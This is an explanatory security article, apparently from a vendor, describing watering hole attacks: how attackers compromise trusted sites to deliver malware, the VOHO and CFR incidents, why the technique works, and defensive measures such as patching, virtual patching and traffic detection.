Watering Hole 101

The term “watering hole” refers to initiating an attack against targeted businesses and organizations. In a watering hole attack scenario, threat actors compromise a carefully selected website by inserting an exploit resulting in malware infection.

Senior threat researcher Nart Villeneuve documented the use of the watering hole technique in both targeted and typical cybercriminal attacks as early as 2009 and 2010.

How does a watering hole technique work?

A watering hole attack typically works this way:

Attackers gather strategic information that they can use to gain entry into their targeted organization. This step can be compared to a military reconnaissance mission. The information gathered may include insights on trusted websites often visited by the employees or members of their targeted entity. The process of selecting websites to compromise was initially dubbed “strategic web compromises.”

Attackers insert an exploit into the selected sites.

Once targeted victims visit the compromised site, the exploit takes advantage of software vulnerabilities, either old or new, to drop malware. The dropped malware may be in the form of a remote access Trojan (RAT), which allows attackers to access sensitive data and take control of the vulnerable system.

Where is this attack technique used?

Watering hole attacks were previously documented in several high-profile cases which include:

VOHO. In mid-2012 RSA identified a campaign known as VOHO, which was aimed at a particular group of organizations, specifically those involved with business and local government agencies in certain geographic areas. The attackers compromised carefully selected sites by inserting malicious JavaScript to deliver a Gh0st RAT variant. Gh0st RATs were previously seen in other attacks that targeted civic organizations and diplomatic entities worldwide.

Attack on high-profile groups. Just before the end of 2012, the Council on Foreign Relations (CFR) website was compromised to host a zero-day exploit in Internet Explorer. Those who visited the site were served with a backdoor malware. Microsoft addressed this vulnerability though the Microsoft Security Bulletin MS13-008.

Why is it effective?

Attackers incorporate strategies to circumvent the targeted organizations’ defenses in order for watering hole attacks to be effective. These may come in the form of outdated systems or simply human error.

In watering hole attacks, the goal is not to serve malware to as many systems possible. Instead, the attackers run exploits on well-known and trusted sites likely to be visited by their targeted victims. This makes the watering hole technique effective in delivering its intended payload.

Aside from carefully choosing sites to compromise, watering hole attacks are known to incorporate zero-day exploits that target unpatched vulnerabilities. Thus, the targeted entities are left with little or no defense against these exploits.

This doesn’t mean that attackers don’t target patched system vulnerabilities. Because of patch management difficulties in an enterprise setting, IT administrators may delay deploying critical updates. This window of exposure may lead to a targeted attack leveraging old, but reliable vulnerabilities.

Who are the targets of a watering hole attack?

The watering hole technique is used in targeted attacks that aim to gather confidential information and intelligence from the following organizations:

Various businesses

Human rights groups

Government offices

The stolen information, in turn, may be used to initiate more damaging attacks against the affected organization.

What is the impact of these attacks?

The social engineering technique used in watering hole attacks is strategic. Unlike a usual social engineering attack, threat actors employing the watering hole technique carefully select the most appropriate legitimate sites to compromise, instead of targeting random sites. Because the watering hole technique targets trusted and frequented sites, relying on solely visiting trusted sites to avoid online threats may not be an effective practice.

In cases where watering hole attacks lead to a RAT, attackers can also execute commands on infected servers. These include spying and monitoring the activities of the target organization.�Because an attacker was able to infiltrate a targeted organization’s network, they can also initiate attacks that are harmful to the organization’s operations, which include modifying or deleting files with crucial information.

We may be seeing more of attacks using watering hole in the future. Trend Micro vice president for cyber security Tom Kellermann predicted that because of its better methodology, watering hole attacks can become a more popular way to pollute trusted sites in 2013.

What can I do to prevent these attacks?

Timely software updating. For watering hole attacks that employ old vulnerabilities, an organization’s best defense is to update systems with the latest software patches offered by vendors.

Vulnerability shielding. Also known as “virtual patching,” it operates on the premise that exploits take a definable network path in order to use a vulnerability. Vulnerability shielding helps administrators scan suspicious traffic as well as any deviations from the typical protocols used. Thus, this monitoring empowers system administrators to prevent exploits.

Network traffic detection. Though attackers may incorporate different exploits or payloads in their attack, the traffic generated by the final malware when communicating with the command-and-control servers remains consistent. By detecting these communications, organizations can readily implement security measures to prevent the attack from further escalating. Technologies such as Trend Micro Deep Discovery can aid IT administrators in detecting suspicious network traffic.

Correlating well-known APT activities. Using big data analytics, organizations can gain insight on whether they are affected by a targeted attack by correlating and associating in-the-wild cybercrime activities with what is happening on an enterprise’ network.

Organizations should also consider building their own local intelligence to document previous cases of targeted attacks within the company. These enable organizations to spot possible correlations and insights needed to create an effective action or recovery plan.

"While cybercriminals use “drive-by” exploits to indiscriminately compromise as many computers as they can, the use of this technique in relation to APT activity is what Shadowserver aptly described as “strategic web compromises. The objective is to selectively target visitors interested in specific content. Such attacks often emerge in conjunction with a new drive-by exploit." – Nart Villeneuve, senior threat researcher